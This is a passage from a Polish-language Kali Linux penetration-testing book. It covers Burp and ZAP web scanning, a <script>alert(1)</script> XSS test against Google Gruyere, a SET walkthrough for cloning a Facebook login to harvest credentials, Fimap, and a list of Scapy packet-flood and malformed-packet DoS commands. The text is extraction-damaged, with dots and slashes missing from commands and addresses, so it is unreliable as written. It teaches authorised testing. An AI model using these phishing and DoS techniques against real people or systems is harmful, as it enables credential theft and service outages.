Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

